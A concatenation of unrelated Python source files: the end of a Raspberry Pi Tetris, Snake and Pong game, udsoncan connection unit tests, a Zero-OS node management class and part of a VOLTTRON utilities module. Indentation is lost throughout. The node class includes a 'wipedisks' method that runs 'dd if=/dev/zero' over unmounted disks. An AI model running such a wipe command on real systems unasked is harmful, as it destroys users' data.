# y - y coordinate on the display (0,0) is the left upper corner
# drawCanvas - the MAX7219 draw canvas
def scoreDisplayInsertColon(x,y,drawCanvas):
drawCanvas.point((x,y+1), fill= "white")
drawCanvas.point((x,y+3), fill= "white")
#TODO provide a pygame version of display
# inserts a single digit on the MAX7219 secondary display
# digit - digit to insert
# x - x coordinate on the display (0,0) is the left upper corner
# y - y coordinate on the display (0,0) is the left upper corner
# drawCancas - the MAX7219 draw canvas
def scoreDisplayInsertDigit(number,x,y,drawCanvas):
# font clock #
# 3x5 point font
# each row is a digit
# each byte represents the vertical lines in binary
clock_font = [
0x1F, 0x11, 0x1F, #0
0x00, 0x00, 0x1F, #1
0x1D, 0x15, 0x17, #2
0x15, 0x15, 0x1F, #3
0x07, 0x04, 0x1F, #4
0x17, 0x15, 0x1D, #5
0x1F, 0x15, 0x1D, #6
0x01, 0x01, 0x1F, #7
0x1F, 0x15, 0x1F, #8
0x17, 0x15, 0x1F] #9
for column in range(3): # 3 columns
for row in range(5): # 5 rows
if((clock_font[3*number+column]>>row)&0x01==0x01):
drawCanvas.point((x+column,y+row), fill= "white")
# inserts a the next tetris pice on the MAX7219 canvas
# nextPieceIndex - index of next piece to insert
# x - x coordinate on the display (0,0) is the left upper corner
# y - y coordinate on the display (0,0) is the left upper corner
# drawCanvas - the MAX7219 draw canvas
def scoreDisplayInsertNextPiece(nextPieceIndex,x,y,drawCanvas):
# tetris clock #
# 4x8 point font
# each row is a symbol
# each byte represents the vertical lines in binary
theTetrisFont = [
0x1E,0x1E,0x78,0x78, #Z
0x78,0x78,0x1E,0x1E, #S
0x00,0xFF,0xFF,0x00, #I
0x7E,0x7E,0x06,0x06, #L
0x06,0x06,0x7E,0x7E, #J
0x3C,0x3C,0x3C,0x3C, #O
0x7E,0x7E,0x18,0x18, #T
]
for column in range(4): # 4 columns
for row in range(8): # 5 rows
if((theTetrisFont[4*nextPieceIndex+column]>>row)&0x01==0x01):
drawCanvas.point((x+column,y+row), fill= "white")
# displays the score on the secondary screen for Snake
# score - score of player
# dev - the MAX2719 device
def updateScoreDisplaySnake(score,dev):
_score=score
if _score>9999: # not more than 4 digits for score
_score = 9999
if PI:
with canvas(dev) as draw:
for digit in range(4):
# start with the smallest digit at the right side; 32 pixel display
scoreDisplayInsertDigit(_score%10,29-4*digit,0,draw)
_score //=10
else:
titleSurf, titleRect = makeTextObjs(str(_score), BASICFONT, TEXTCOLOR)
titleRect.center = (int(WINDOWWIDTH / 2) - 3, int(WINDOWHEIGHT / 2) - 3)
DISPLAYSURF.blit(titleSurf, titleRect)
# displays the score on the secondary screen for Tetris
# score - score of player
# level - current level
# nextPiece - index of next piece
# dev - the MAX2719 device
def updateScoreDisplayTetris(score,level,nextPiece,dev):
_score=score
if _score>999999: # not more than 6 digits for score
_score = 999999
# score as 6 digit value
if PI:
with canvas(dev) as draw:
# two point per level? TODO what is the maximum level???
for i in range(level):# insert level bar; 6 pixel offset to display next piece
draw.point((2*i+6,7), fill= "white")
draw.point((2*i+7,7), fill= "white")
for digit in range(6):
# start with the smallest digit at the right side; 32 pixel display
scoreDisplayInsertDigit(_score%10,29-4*digit,0,draw)
_score //=10
scoreDisplayInsertNextPiece(nextPiece,0,0,draw)
#displays the score on the secondary screen for pong
# score1 - score of player1
# score2 - score of player2
# dev - the MAX2719 device
def updateScoreDisplayPong(score1,score2,dev):
_score1=score1
if _score1>9: # not more than 1 digit for score
_score1 = 9
_score2=score2
if _score2>9: # not more than 1 digit for score
_score2 = 9
if PI:
with canvas(dev) as draw:
scoreDisplayInsertDigit(_score2,29,0,draw)
scoreDisplayInsertDigit(0,25,0,draw)
scoreDisplayInsertColon(22,0,draw)
scoreDisplayInsertDigit(_score1,17,0,draw)
scoreDisplayInsertDigit(0,13,0,draw)
else:
titleSurf, titleRect = makeTextObjs(str(_score1)+':'+str(_score2), BASICFONT, TEXTCOLOR)
titleRect.center = (int(WINDOWWIDTH / 2) - 3, int(WINDOWHEIGHT / 2) - 3)
DISPLAYSURF.blit(titleSurf, titleRect)
# program flow #
def terminate():
RUNNING = False
if not PI:
pygame.quit()
sys.exit()
def checkForQuit():
for event in pygame.event.get(QUIT): # get all the QUIT events
terminate() # terminate if any QUIT events are present
for event in pygame.event.get(KEYUP): # get all the KEYUP events
if event.key == K_ESCAPE:
terminate() # terminate if the KEYUP event was for the Esc key
pygame.event.post(event) # put the other KEYUP event objects back
# tetris subroutines #
def calculateLevelAndFallFreq(lines):
# Based on the score, return the level the player is on and
# how many seconds pass until a falling piece falls one space.
level = int(lines / 10) + 1
# limit level to 10
if level >10:
level = 10
fallFreq = FALLING_SPEED - (level * 0.05)
if fallFreq <= 0.05:
fallFreq = 0.05
return level, fallFreq
def getNewPiece():
# return a random new piece in a random rotation and color
shape = random.choice(list(PIECES.keys()))
newPiece = {'shape': shape,
'rotation': random.randint(0, len(PIECES[shape]) - 1),
'x': int(BOARDWIDTH / 2) - int(TEMPLATEWIDTH / 2),
'y': -2, # start it above the board (i.e. less than 0)
'color': PIECES_ORDER.get(shape)}
return newPiece
def addToBoard(board, piece):
# fill in the board based on piece's location, shape, and rotation
for x in range(TEMPLATEWIDTH):
for y in range(TEMPLATEHEIGHT):
if PIECES[piece['shape']][piece['rotation']][y][x] != BLANK:
board[x + piece['x']][y + piece['y']] = piece['color']
def isOnBoard(x, y):
return x >= 0 and x < BOARDWIDTH and y < BOARDHEIGHT
def isValidPosition(board, piece, adjX=0, adjY=0):
# Return True if the piece is within the board and not colliding
for x in range(TEMPLATEWIDTH):
for y in range(TEMPLATEHEIGHT):
isAboveBoard = y + piece['y'] + adjY < 0
if isAboveBoard or PIECES[piece['shape']][piece['rotation']][y][x] == BLANK:
continue
if not isOnBoard(x + piece['x'] + adjX, y + piece['y'] + adjY):
return False
if board[x + piece['x'] + adjX][y + piece['y'] + adjY] != BLANK:
return False
return True
def isCompleteLine(board, y):
# Return True if the line filled with boxes with no gaps.
for x in range(BOARDWIDTH):
if board[x][y] == BLANK:
return False
return True
def removeCompleteLines(board):
# Remove any completed lines on the board, move everything above them down, and return the number of complete lines.
numLinesRemoved = 0
y = BOARDHEIGHT - 1 # start y at the bottom of the board
while y >= 0:
if isCompleteLine(board, y):
# Remove the line and pull boxes down by one line.
for pullDownY in range(y, 0, -1):
for x in range(BOARDWIDTH):
board[x][pullDownY] = board[x][pullDownY-1]
# Set very top line to blank.
for x in range(BOARDWIDTH):
board[x][0] = BLANK
numLinesRemoved += 1
# Note on the next iteration of the loop, y is the same.
# This is so that if the line that was pulled down is also
# complete, it will be removed.
else:
y -= 1 # move on to check next row up
return numLinesRemoved
def drawBoard(matrix):
for i in range(0,BOARDWIDTH):
for j in range(0,BOARDHEIGHT):
drawPixel(i,j,matrix[i][j])
def getBlankBoard():
# create and return a new blank board data structure
board = []
for i in range(BOARDWIDTH):
board.append([BLANK] * BOARDHEIGHT)
return board
def drawPiece(piece, pixelx=None, pixely=None):
shapeToDraw = PIECES[piece['shape']][piece['rotation']]
if pixelx == None and pixely == None:
# if pixelx & pixely hasn't been specified, use the location stored in the piece data structure
pixelx=piece['x']
pixely=piece['y']
# draw each of the boxes that make up the piece
for x in range(TEMPLATEWIDTH):
for y in range(TEMPLATEHEIGHT):
if shapeToDraw[y][x] != BLANK:
drawPixel( pixelx+ x , pixely+y,piece['color'])
# snake subroutines #
def getRandomLocation():
return {'x': random.randint(0, BOARDWIDTH - 1), 'y': random.randint(0, BOARDHEIGHT - 1)}
def drawWorm(wormCoords):
for coord in wormCoords:
x = coord['x']
y = coord['y']
drawPixel(x,y,1)
def drawApple(coord):
x = coord['x']
y = coord['y']
drawPixel(x,y,2)
# pong subroutines #
def drawBar(x,y):
drawPixel(x-1,y,1)
drawPixel(x,y,1)
drawPixel(x+1,y,1)
def drawBall(x,y):
drawPixel(x,y,0)
if __name__ == '__main__':
main()
|
test_connection.py | from test.UdsTest import UdsTest
from udsoncan.connections import *
from test.stub import StubbedIsoTPSocket
import socket
import threading
import time
import unittest
try:
_STACK_UNVAILABLE_REASON = ''
_interface_name = 'vcan0'
import isotp
import can
s = isotp.socket()
s.bind(_interface_name,rxid=1,txid=2)
s.close()
_STACK_POSSIBLE = True
except Exception as e:
_STACK_UNVAILABLE_REASON = str(e)
_STACK_POSSIBLE = False
class TestIsoTPSocketConnection(UdsTest):
def setUp(self):
self.tpsock1 = StubbedIsoTPSocket(timeout=0.1)
self.tpsock2 = StubbedIsoTPSocket(timeout=0.1)
def test_open(self):
conn = IsoTPSocketConnection(interface='vcan0', rxid=0x001, txid=0x002, tpsock=self.tpsock1, name='unittest')
self.assertFalse(conn.is_open())
conn.open()
self.assertTrue(conn.is_open())
conn.close()
self.assertFalse(conn.is_open())
def test_transmit(self):
conn1 = IsoTPSocketConnection(interface='vcan0', rxid=0x100, txid=0x101, tpsock=self.tpsock1, name='unittest')
conn2 = IsoTPSocketConnection(interface='vcan0', rxid=0x101, txid=0x100, tpsock=self.tpsock2, name='unittest')
with conn1.open():
with conn2.open():
payload1 = b"\x00\x01\x02\x03\x04"
conn1.send(payload1)
payload2 = conn2.wait_frame(timeout=0.3)
self.assertEqual(payload1, payload2)
class TestSocketConnection(UdsTest):
def server_sock_thread_task(self):
self.thread_started=True
self.sock1, addr = self.server_sock.accept()
def setUp(self):
self.thread_started = False
self.server_sock_thread = threading.Thread(target=self.server_sock_thread_task)
self.server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server_sock.setblocking(False)
self.sock1 = None
self.sock2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server_sock.settimeout(0.5)
self.server_sock.bind(('127.0.0.1', 0))
self.server_sock.listen(1)
self.server_sock_thread.start()
t1 = time.time()
while not self.thread_started:
if (time.time() - t1) > 0.5:
raise RuntimeError('Timeout while connecting sockets together.')
time.sleep(0.01)
time.sleep(0.01)
self.sock2.connect(self.server_sock.getsockname())
t1 = time.time()
while self.sock1 is None:
if (time.time() - t1) > 0.5:
raise RuntimeError('Timeout while connecting sockets together.')
def tearDown(self):
if isinstance(self.sock1, socket.socket):
self.sock1.close()
if isinstance(self.sock2, socket.socket):
self.sock2.close()
if isinstance(self.server_sock, socket.socket):
self.server_sock.close()
def test_open(self):
conn = SocketConnection(self.sock1, name='unittest')
self.assertFalse(conn.is_open())
conn.open()
self.assertTrue(conn.is_open())
conn.close()
self.assertFalse(conn.is_open())
def test_transmit(self):
conn1 = SocketConnection(self.sock1, name='unittest')
conn2 = SocketConnection(self.sock2, name='unittest')
with conn1.open():
with conn2.open():
payload1 = b"\x00\x01\x02\x03\x04"
conn1.send(payload1)
payload2 = conn2.wait_frame(timeout=1, exception=True)
self.assertEqual(payload1, payload2)
class TestQueueConnection(UdsTest):
def setUp(self):
self.conn = QueueConnection(name='unittest')
self.conn.open()
def tearDown(self):
self.conn.close()
def test_open(self):
self.assertTrue(self.conn.is_open())
def test_receive(self):
payload = b"\x00\x01\x02\x03"
self.conn.fromuserqueue.put(payload)
frame = self.conn.wait_frame()
self.assertEqual(frame, payload)
def test_send(self):
payload = b"\x00\x01\x02\x03"
self.conn.send(payload)
frame = self.conn.touserqueue.get()
self.assertEqual(frame, payload)
def test_truncate(self):
payload = b"\x00\x01\x02\x03"*5000
self.conn.send(payload)
frame = self.conn.touserqueue.get()
self.assertEqual(len(frame), 4095)
self.assertEqual(frame, payload[0:4095])
self.conn.fromuserqueue.put(payload)
frame = self.conn.wait_frame()
self.assertEqual(len(frame), 4095)
self.assertEqual(frame, payload[0:4095])
def test_reopen(self):
payload = b"\x00\x01\x02\x03"
self.conn.send(payload)
self.conn.fromuserqueue.put(payload)
self.conn.close()
self.conn.open()
with self.assertRaises(TimeoutException):
self.conn.wait_frame(timeout=0.05, exception=True)
self.assertTrue(self.conn.touserqueue.empty())
@unittest.skipIf(_STACK_POSSIBLE == False, 'Cannot test TestPythonIsoTpConnection. %s' % _STACK_UNVAILABLE_REASON)
class TestPythonIsoTpConnection(UdsTest):
def __init__(self, *args, **kwargs):
UdsTest.__init__(self, *args, **kwargs)
if not hasattr(self.__class__, '_next_id'):
self.__class__._next_id=1
self.stack_txid = self.__class__._next_id
self.stack_rxid = self.__class__._next_id +1
self.__class__._next_id += 2
def make_bus(self):
return can.interface.Bus(bustype='socketcan', channel='vcan0', bitrate=500000, receive_own_messages=True)
def setUp(self):
self.vcan0_bus = self.make_bus()
addr = isotp.Address(isotp.AddressingMode.Normal_11bits, rxid=self.stack_rxid, txid=self.stack_txid)
self.conn = PythonIsoTpConnection(isotp.CanStack(bus=self.vcan0_bus, address=addr), name='unittest')
self.conn.open()
def test_open(self):
self.assertTrue(self.conn.is_open())
def test_receive(self):
self.vcan0_bus.send(can.Message(arbitration_id = self.stack_rxid, data = b"\x03\x01\x02\x03", extended_id = False))
frame = self.conn.wait_frame(timeout=1)
self.assertEqual(frame, b"\x01\x02\x03")
def test_send(self):
self.conn.send(b"\xAA\xBB\xCC\xDD\xEE\xFF")
t1 = time.time()
msg = self.vcan0_bus.recv(1)
self.assertIsNotNone(msg)
self.assertEqual(msg.data, b'\x06\xAA\xBB\xCC\xDD\xEE\xFF')
def test_reopen(self):
self.conn.send(b"\x0A\x0B\x0C\x0D")
self.vcan0_bus.send(can.Message(arbitration_id = self.stack_rxid, data = b"\x03\x01\x02\x03", extended_id = False))
self.conn.close()
self.vcan0_bus.shutdown()
self.vcan0_bus = self.make_bus()
self.conn.open(bus=self.vcan0_bus)
with self.assertRaises(TimeoutException):
self.conn.wait_frame(timeout=0.05, exception=True)
self.assertIsNone(self.vcan0_bus.recv(0))
def tearDown(self):
self.conn.close()
self.vcan0_bus.shutdown()
|
Node.py | import time
from collections import namedtuple
from datetime import datetime
from io import BytesIO
import netaddr
import redis
import uuid
import threading
from Jumpscale import j
from ..capacity.Capacity import Capacity
from ..container.Container import Containers
from ..disks.Disks import Disks, StorageType
from ..healthchecks.healthcheck import HealthCheck
from ..network.Network import Network
from ..storage.StoragePool import StoragePools
from ..gateway import Gateways
from ..zerodb import Zerodbs
from ..primitives.Primitives import Primitives
from ..hypervisor.Hypervisor import Hypervisor
from ..utils import get_ip_from_nic, get_zt_ip
Mount = namedtuple("Mount", ["device", "mountpoint", "fstype", "options"])
SUPPORT_NETWORK = "172.29.0.0/16"
ZOS_CACHE = "zos-cache"
class Node:
"""Represent a Zero-OS Server"""
def __init__(self, client):
# g8os client to talk to the node
self._storage_addr = None
self._node_id = None
self.disks = Disks(self)
self.storagepools = StoragePools(self)
self.containers = Containers(self)
self.gateways = Gateways(self)
self.zerodbs = Zerodbs(self)
self.primitives = Primitives(self)
self.hypervisor = Hypervisor(self)
self.network = Network(self)
self.healthcheck = HealthCheck(self)
self.capacity = Capacity(self)
self.client = client
@property
def addr(self):
return self.client.host
@property
def port(self):
return self.client.port
def ping(self):
return self.client.ping()
@property
def node_id(self):
if self._node_id is None:
nics = self.client.info.nic()
macgwdev, _ = self.get_nic_hwaddr_and_ip(nics)
if not macgwdev:
raise AttributeError("name not found for node {}".format(self))
self._node_id = macgwdev.replace(":", "")
return self._node_id
@property
def kernel_args(self):
args = self.download_content("/proc/cmdline").split()
result = dict()
for arg in args:
split = arg.split("=")
value = split[1] if len(split) > 1 else ""
result[split[0]] = value
return result
def shell(self):
"""
Pseudo shell interactive ash shell will be triggered
Full line commands can be send to the shell (not tabcomplete or fancyness though)
"""
fifofile = "/tmp/{}".format(uuid.uuid4())
self.client.system("mkfifo {}".format(fifofile))
proc = self.client.bash("ash < {}".format(fifofile), stream=True)
reader = threading.Thread(target=proc.stream)
reader.start()
writer = self.client.filesystem.open(fifofile, "w")
while True:
try:
cmd = input("# ").encode("utf-8")
except EOFError:
break
if cmd:
self.client.filesystem.write(writer, cmd + b";pwd\n")
self.client.filesystem.close(writer)
self.client.filesystem.remove(fifofile)
self.client.job.kill(proc.id, 9)
@property
def storage_addr(self):
if not self._storage_addr:
nic_data = self.client.info.nic()
for nic in nic_data:
if nic["name"] == "backplane":
self._storage_addr = get_ip_from_nic(nic["addrs"])
return self._storage_addr
self._storage_addr = self.public_addr
return self._storage_addr
@property
def storageAddr(self):
j.tools.logger._log_warning("storageAddr is deprecated, use storage_addr instead")
return self.storage_addr
@property
def public_addr(self):
nics = self.client.info.nic()
ip = get_zt_ip(nics, False, SUPPORT_NETWORK)
if ip:
return ip
_, ip = self.get_nic_hwaddr_and_ip(nics)
return ip
@property
def support_address(self):
nics = self.client.info.nic()
ip = get_zt_ip(nics, True, SUPPORT_NETWORK)
if ip:
return ip
raise j.exceptions.NotFound("their is no support zerotier interface (support_address)")
@property
def management_address(self):
return self.public_addr
def generate_zerotier_identity(self):
return self.client.system("zerotier-idtool generate").get().stdout.strip()
def get_gateway_route(self):
for route in self.client.ip.route.list():
if route["gw"] and not route["dst"]:
return route
raise j.exceptions.NotFound("Could not find route with default gw")
def get_gateway_nic(self):
return self.get_gateway_route()["dev"]
def get_nic_hwaddr_and_ip(self, nics=None, name=None):
if nics is None:
nics = self.client.info.nic()
if not name:
name = self.get_gateway_nic()
for nic in nics:
if nic["name"] == name:
return nic["hardwareaddr"], get_ip_from_nic(nic["addrs"])
return "", ""
def get_nic_by_ip(self, addr):
try:
res = next(
nic for nic in self.client.info.nic() if any(addr == a["addr"].split("/")[0] for a in nic["addrs"])
)
return res
except StopIteration:
return None
def _eligible_zeroos_cache_disk(self, disks):
"""
return the first disk that is eligible to be used as filesystem cache
First try to find a ssd disk, otherwise return a HDD
"""
priorities = [StorageType.SSD, StorageType.HDD, StorageType.NVME]
eligible = {t: [] for t in priorities}
# Pick up the first ssd
usedisks = []
for pool in self.client.btrfs.list() or []:
for device in pool["devices"]:
usedisks.append(device["path"])
for disk in disks[::-1]:
if disk.devicename in usedisks or len(disk.partitions) > 0 or disk.transport == "usb":
continue
if disk.type in priorities:
eligible[disk.type].append(disk)
# pick up the first disk according to priorities
for t in priorities:
if eligible[t]:
return eligible[t][0]
else:
raise j.exceptions.Base("cannot find eligible disks for the fs cache")
def find_disks(self, disk_type):
"""
return a list of disk that are not used by storage pool
or has a different type as the one required for this cluster
"""
available_disks = {}
for disk in self.disks.list():
# skip disks of wrong type
if disk.type.name != disk_type:
continue
# skip devices which have filesystems on the device
if len(disk.filesystems) > 0:
continue
# include devices which have partitions
if len(disk.partitions) == 0:
available_disks.setdefault(self.node_id, []).append(disk)
return available_disks
def _mount_zeroos_cache(self, storagepool):
"""
mount the zeroos_cache storage pool and copy the content of the in memmory fs inside
"""
mountedpaths = [mount.mountpoint for mount in self.list_mounts()]
def create_cache_dir(path, name):
self.client.filesystem.mkdir(path)
if path not in mountedpaths:
if storagepool.exists(name):
storagepool.get(name).delete()
fs = storagepool.create(name)
self.client.disk.mount(storagepool.devicename, path, ["subvol={}".format(fs.subvolume)])
create_cache_dir("/var/cache/containers", "containercache")
create_cache_dir("/var/cache/vm", "vmcache")
logpath = "/var/log"
if logpath not in mountedpaths:
# logs is empty filesystem which we create a snapshot on to store logs of current boot
snapname = "{:%Y-%m-%d-%H-%M}".format(datetime.now())
fs = storagepool.get("logs")
snapshot = fs.create(snapname)
self.client.bash("mkdir /tmp/log && mv /var/log/* /tmp/log/")
self.client.disk.mount(storagepool.devicename, logpath, ["subvol={}".format(snapshot.subvolume)])
self.client.bash("mv /tmp/log/* /var/log/").get()
self.client.log_manager.reopen()
# startup syslogd and klogd
self.client.system("syslogd -n -O /var/log/messages")
self.client.system("klogd -n")
def freeports(self, nrports=1):
"""
Find free ports on node starting at baseport
ask to reserve an x amount of ports
The system detects the local listening ports, plus the ports used for other port forwards, and finally the reserved ports
The system tries to find the first free port in the valid ports range.
:param nrports: Amount of free ports to find
:type nrports: int
:return: list if ports that are free
:rtype: list(int)
"""
return self.client.socat.reserve(number=nrports)
def find_persistance(self, name=None):
if not name:
name = ZOS_CACHE
zeroos_cache_sp = None
for sp in self.storagepools.list():
if sp.name == name:
zeroos_cache_sp = sp
break
return zeroos_cache_sp
def is_configured(self, name="zos-cache"):
zeroos_cache_sp = self.find_persistance(name)
if zeroos_cache_sp is None:
return False
return bool(zeroos_cache_sp.mountpoint)
def ensure_persistance(self, name="zos-cache"):
"""
look for a disk not used,
create a partition and mount it to be used as cache for the g8ufs
set the label `zos-cache` to the partition
"""
disks = self.disks.list()
if len(disks) <= 0:
# if no disks, we can't do anything
return
# check if there is already a storage pool with the fs_cache label
zeroos_cache_sp = self.find_persistance(name)
# create the storage pool if we don't have one yet
if zeroos_cache_sp is None:
disk = self._eligible_zeroos_cache_disk(disks)
zeroos_cache_sp = self.storagepools.create(
name, device=disk.devicename, metadata_profile="single", data_profile="single", overwrite=True
)
zeroos_cache_sp.mount()
try:
zeroos_cache_sp.get("logs")
except ValueError:
zeroos_cache_sp.create("logs")
# mount the storage pool
self._mount_zeroos_cache(zeroos_cache_sp)
return zeroos_cache_sp
def download_content(self, remote):
buff = BytesIO()
self.client.filesystem.download(remote, buff)
return buff.getvalue().decode()
def upload_content(self, remote, content):
if isinstance(content, str):
content = content.encode("utf8")
bytes = BytesIO(content)
self.client.filesystem.upload(remote, bytes)
def wipedisks(self):
j.tools.logger._log_debug("Wiping node {hostname}".format(**self.client.info.os()))
jobs = []
# for disk in self.client.disk.list():
for disk in self.disks.list():
if disk.type == StorageType.CDROM:
j.tools.logger._log_debug(" * Not wiping cdrom {kname} {model}".format(**disk._disk_info))
continue
if disk.transport == "usb":
j.tools.logger._log_debug(" * Not wiping usb {kname} {model}".format(**disk._disk_info))
continue
if not disk.mountpoint:
for part in disk.partitions:
if part.mountpoint:
j.tools.logger._log_debug(
" * Not wiping {device} because {part} is mounted at {mountpoint}".format(
device=disk.devicename, part=part.devicename, mountpoint=part.mountpoint
)
)
break
else:
j.tools.logger._log_debug(" * Wiping disk {kname}".format(**disk._disk_info))
jobs.append(self.client.system("dd if=/dev/zero of={} bs=1M count=50".format(disk.devicename)))
else:
j.tools.logger._log_debug(
" * Not wiping {device} mounted at {mountpoint}".format(
device=disk.devicename, mountpoint=disk.mountpoint
)
)
# wait for wiping to complete
for job in jobs:
job.get()
def list_mounts(self):
allmounts = []
for mount in self.client.info.disk():
allmounts.append(Mount(mount["device"], mount["mountpoint"], mount["fstype"], mount["opts"]))
return allmounts
def get_mount_path(self, path):
"""
Get the parent mountpoint for a path
:param path: path you want to retrieve the mountpoint for
:type path: str
:rtype: str
:return: path to the mountpoint
"""
bestmatch = "/"
for mount in self.list_mounts():
if mount.mountpoint in path and len(mount.mountpoint) > len(bestmatch):
bestmatch = mount.mountpoint
return bestmatch
def is_running(self, timeout=30):
state = False
start = time.time()
err = None
while time.time() < start + timeout:
try:
self.client.testConnectionAttempts = 0
state = self.client.ping()
break
except (RuntimeError, ConnectionError, redis.ConnectionError, redis.TimeoutError, TimeoutError) as error:
err = error
time.sleep(1)
else:
j.tools.logger._log_debug("Could not ping %s within 30 seconds due to %s" % (self.addr, err))
return state
def uptime(self):
response = self.client.system("cat /proc/uptime").get()
output = response.stdout.split(" ")
return float(output[0])
def reboot(self):
self.client.raw("core.reboot", {})
def __str__(self):
return "Node <{host}:{port}>".format(host=self.addr, port=self.port)
def __repr__(self):
return str(self)
def __eq__(self, other):
a = "{}:{}".format(self.addr, self.port)
b = "{}:{}".format(other.addr, other.port)
return a == b
def __hash__(self):
return hash((self.addr, self.port))
|
utils.py | # -*- coding: utf-8 -*- {{{
# vim: set fenc=utf-8 ft=python sw=4 ts=4 sts=4 et:
#
# Copyright 2017, Battelle Memorial Institute.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This material was prepared as an account of work sponsored by an agency of
# the United States Government. Neither the United States Government nor the
# United States Department of Energy, nor Battelle, nor any of their
# employees, nor any jurisdiction or organization that has cooperated in the
# development of these materials, makes any warranty, express or
# implied, or assumes any legal liability or responsibility for the accuracy,
# completeness, or usefulness or any information, apparatus, product,
# software, or process disclosed, or represents that its use would not infringe
# privately owned rights. Reference herein to any specific commercial product,
# process, or service by trade name, trademark, manufacturer, or otherwise
# does not necessarily constitute or imply its endorsement, recommendation, or
# favoring by the United States Government or any agency thereof, or
# Battelle Memorial Institute. The views and opinions of authors expressed
# herein do not necessarily state or reflect those of the
# United States Government or any agency thereof.
#
# PACIFIC NORTHWEST NATIONAL LABORATORY operated by
# BATTELLE for the UNITED STATES DEPARTMENT OF ENERGY
# under Contract DE-AC05-76RL01830
# }}}
"""VOLTTRON platform™ agent helper classes/functions."""
import argparse
import calendar
import errno
import logging
import sys
import syslog
import traceback
from datetime import datetime, tzinfo, timedelta
import gevent
import os
import pytz
import re
import stat
import time
from volttron.platform import get_home, get_address
from dateutil.parser import parse
from dateutil.tz import tzutc, tzoffset
from tzlocal import get_localzone
from volttron.platform.agent import json as jsonapi
try:
from ..lib.inotify.green import inotify, IN_MODIFY
except AttributeError:
# inotify library is not available on OS X/MacOS.
# @TODO Integrate with the OS X FS Events API
inotify = None
IN_MODIFY = None
__all__ = ['load_config', 'run_agent', 'start_agent_thread',
'is_valid_identity']
__author__ = 'Brandon Carpenter <brandon.carpenter@pnnl.gov>'
__copyright__ = 'Copyright (c) 2016, Battelle Memorial Institute'
__license__ = 'FreeBSD'
_comment_re = re.compile(
r'((["\'])(?:\\?.)*?\2)|(/\*.*?\*/)|((?:#|//).*?(?=\n|$))',
re.MULTILINE | re.DOTALL)
_log = logging.getLogger(__name__)
# The following are the only allowable characters for identities.
_VALID_IDENTITY_RE = re.compile(r"^[A-Za-z0-9_.\-]+$")
def is_valid_identity(identity_to_check):
""" Checks the passed identity to see if it contains invalid characters
A None value for identity_to_check will return False
@:param: string: The vip_identity to check for validity
@:return: boolean: True if values are in the set of valid characters.
"""
if identity_to_check is None:
return False
return _VALID_IDENTITY_RE.match(identity_to_check)
def normalize_identity(pre_identity):
if is_valid_identity(pre_identity):
return pre_identity
if pre_identity is None:
raise ValueError("Identity cannot be none.")
norm = ""
for s in pre_identity:
if _VALID_IDENTITY_RE.match(s):
norm += s
else:
norm += '_'
return norm
def _repl(match):
"""Replace the matched group with an appropriate string."""
# If the first group matched, a quoted string was matched and should
# be returned unchanged. Otherwise a comment was matched and the
# empty string should be returned.
return match.group(1) or ''
def strip_comments(string):
"""Return string with all comments stripped.
Both JavaScript-style comments (//... and /*...*/) and hash (#...)
comments are removed.
"""
return _comment_re.sub(_repl, string)
def load_config(config_path):
"""Load a JSON-encoded configuration file."""
if config_path is None:
_log.info("AGENT_CONFIG does not exist in environment. load_config returning empty configuration.")
return {}
if not os.path.exists(config_path):
_log.info("Config file specified by AGENT_CONFIG does not exist. load_config returning empty configuration.")
return {}
try:
with open(config_path) as f:
return parse_json_config(f.read())
except StandardError as e:
_log.error("Problem parsing agent configuration")
raise
def update_kwargs_with_config(kwargs, config):
"""
Loads the user defined configurations into kwargs.
1. Converts any dash/hyphen in config variables into underscores
2. Checks for configured "identity" value. Prints a deprecation
warning and uses it.
3. Checks for configured "agentid" value. Prints a deprecation warning
and ignores it
:param kwargs: kwargs to be updated
:param config: dictionary of user/agent configuration
"""
if config.get('identity') is not None:
_log.warning("DEPRECATION WARNING: Setting a historian's VIP IDENTITY"
" from its configuration file will no longer be supported"
" after VOLTTRON 4.0")
_log.warning(
"DEPRECATION WARNING: Using the identity configuration setting "
"will override the value provided by the platform. This new value "
"will not be reported correctly by 'volttron-ctl status'")
_log.warning("DEPRECATION WARNING: Please remove 'identity' from your "
"configuration file and use the new method provided by "
"the platform to set an agent's identity. See "
"scripts/core/make-mongo-historian.sh for an example of "
"how this is done.")
if config.get('agentid') is not None:
_log.warning("WARNING: Agent id cannot be configured. It is a unique "
"id assigned by VOLTTRON platform. Ignoring configured "
"agentid")
config.pop('agentid')
for k, v in config.items():
kwargs[k.replace("-","_")] = v
def parse_json_config(config_str):
"""Parse a JSON-encoded configuration file."""
return jsonapi.loads(strip_comments(config_str))
def run_agent(cls, subscribe_address=None, publish_address=None,
config_path=None, **kwargs):
"""Instantiate an agent and run it in the current thread.
Attempts to get keyword parameters from the environment if they
are not set.
"""
if not subscribe_address:
subscribe_address = os.environ.get('AGENT_SUB_ADDR')
if subscribe_address:
kwargs['subscribe_address'] = subscribe_address
if not publish_address:
publish_address = os.environ.get('AGENT_PUB_ADDR')
if publish_address:
kwargs['publish_address'] = publish_address
if not config_path:
config_path = os.environ.get('AGENT_CONFIG')
if config_path:
kwargs['config_path'] = config_path
agent = cls(**kwargs)
agent.run()
def start_agent_thread(cls, **kwargs):
"""Instantiate an agent class and run it in a new daemon thread.
Returns the thread object.
"""
import threading
agent = cls(**kwargs)
thread = threading.Thread(target=agent.run)
thread.daemon = True
thread.start()
return thread
def isapipe(fd):
fd = getattr(fd, 'fileno', lambda: fd)()
return stat.S_ISFIFO(os.fstat(fd).st_mode)
def default_main(agent_class, description=None, argv=sys.argv,
parser_class=argparse.ArgumentParser, **kwargs):
"""Default main entry point implementation for legacy agents.
description and parser_class are depricated. Please avoid using them.
"""
try:
# If stdout is a pipe, re-open it line buffered
if isapipe(sys.stdout):
# Hold a reference to the previous file object so it doesn't
# get garbage collected and close the underlying descriptor.
stdout = sys.stdout
sys.stdout = os.fdopen(stdout.fileno(), 'w', 1)
try:
sub_addr = os.environ['AGENT_SUB_ADDR']
pub_addr = os.environ['AGENT_PUB_ADDR']
except KeyError as exc:
sys.stderr.write(
'missing environment variable: {}\n'.format(exc.args[0]))
sys.exit(1)
